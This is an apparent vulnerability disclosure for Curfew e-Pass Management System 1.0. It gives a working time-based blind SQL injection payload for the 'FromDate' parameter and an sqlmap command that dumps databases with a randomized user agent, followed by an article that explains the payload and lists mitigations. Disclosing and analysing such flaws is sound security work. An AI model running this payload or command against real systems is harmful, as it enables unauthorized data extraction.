Curfew e-Pass Management System 1.0 - FromDate SQL Injection
# Exploit Title: Curfew e-Pass Management System 1.0 - FromDate SQL
Injection
# Date: 28/9/2023
# Exploit Author: Puja Dey
# Vendor Homepage: https://phpgurukul.com
# Software Link:
https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10/Wamp
1) login into the application
2) click on report on pass and capture the request in burpsuite
3) Parameter "FromDate" is vulnerable to SQL Injection
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND
'SOzQ'='SOzQ&todate=&submit=
4) Put '*' in the value for the parameter and save the item as cpme
5) Run sqlmap -r cpme --batch --dbs --random-agentCurfew e-Pass Management System 1.0: A Deep Dive into FromDate SQL Injection Vulnerability
Security vulnerabilities in web applications remain a persistent threat, especially in systems built on outdated or poorly secured frameworks. The Curfew e-Pass Management System 1.0, developed by phpgurukul.com, serves as a prime example of how seemingly benign functionality can expose critical flaws. This article examines a specific vulnerability in the FromDate parameter, which enables time-based blind SQL injection — a sophisticated attack technique that allows attackers to extract data without direct output.
Understanding the Vulnerability
The system is designed to manage curfew passes, allowing users to generate and report pass details based on date ranges. The FromDate field is used to filter records from a specific date onward. However, this input is not properly sanitized, making it susceptible to SQL injection.
During penetration testing, an attacker discovered that when the FromDate parameter is manipulated with a crafted payload, the server delays its response based on the execution time of a SLEEP() function in MySQL. This behavior is characteristic of time-based blind SQL injection, where the attacker infers data by measuring response delays.
Exploitation Process and Payload Analysis
Here is the malicious payload used to exploit the vulnerability:
fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND 'SOzQ'='SOzQ&todate=&submit=
Explanation:
- fromdate=' — This starts the SQL injection by terminating the original query with a single quote.
- AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) — This injects a subquery that triggers MySQL's
SLEEP(5)function, causing the database to pause for 5 seconds. - AND 'SOzQ'='SOzQ — This is a dummy condition to maintain syntactic validity, ensuring the SQL query remains valid and does not break.
- &todate=&submit= — These are additional parameters, but they are irrelevant to the injection since the attack relies solely on the
FromDatefield.
When this payload is sent, the server takes approximately 5 seconds to respond — a clear indication that the SLEEP() function executed. This time delay confirms the presence of SQL injection, even without seeing the actual output.
Automated Exploitation with sqlmap
Once the vulnerability is confirmed, security researchers can leverage automated tools like sqlmap to extract database information. The following command demonstrates how to exploit the vulnerability:
sqlmap -r cpme --batch --dbs --random-agent
Explanation:
-r cpme— Specifies the request file (saved ascpme) containing the malicious POST data.--batch— Enables automated, non-interactive mode, reducing manual input.--dbs— Instructs sqlmap to enumerate all available databases.--random-agent— Helps evade detection by using randomized HTTP User-Agent headers.
Running this command will allow sqlmap to automatically probe the database, identify the database name, and potentially extract tables, columns, and even sensitive data such as user credentials or pass records.
Real-World Implications and Risks
This vulnerability poses significant risks in real-world scenarios:
- Data Exposure: An attacker could extract user data, including names, contact details, and pass history.
- Privilege Escalation: If the database contains administrative credentials, an attacker could gain full control over the system.
- System Integrity Compromise: Malicious SQL injection could lead to data deletion, modification, or unauthorized access.
Given that the system is used for curfew management — a critical public safety function — such a vulnerability could be exploited to disrupt enforcement, create fake passes, or even disable reporting mechanisms.
Best Practices and Mitigation Strategies
To prevent such vulnerabilities, developers must follow secure coding practices:
| Security Measure | Description |
|---|---|
| Input Sanitization | Validate and sanitize all user inputs, especially date fields, using strict format checks (e.g., YYYY-MM-DD). |
| Parameterized Queries | Use prepared statements to separate SQL code from data, preventing injection entirely. |
| Rate Limiting | Implement throttling to detect and block repeated malicious requests, especially those causing delays. |
| Web Application Firewall (WAF) | Deploy a WAF to detect and block SQL injection attempts in real-time. |
Additionally, the vendor should release an updated version with security patches, and users should avoid deploying unpatched versions in production environments.
Conclusion
The Curfew e-Pass Management System 1.0 exemplifies how even simple input fields can become entry points for serious security breaches. The FromDate SQL injection vulnerability, while seemingly minor, enables powerful exploitation via time-based blind techniques. This case underscores the importance of rigorous input validation, secure coding standards, and proactive vulnerability management in public-facing systems.
Security is not a one-time task — it requires continuous monitoring, testing, and patching. Developers and administrators must treat every input as a potential threat, especially in systems handling sensitive data.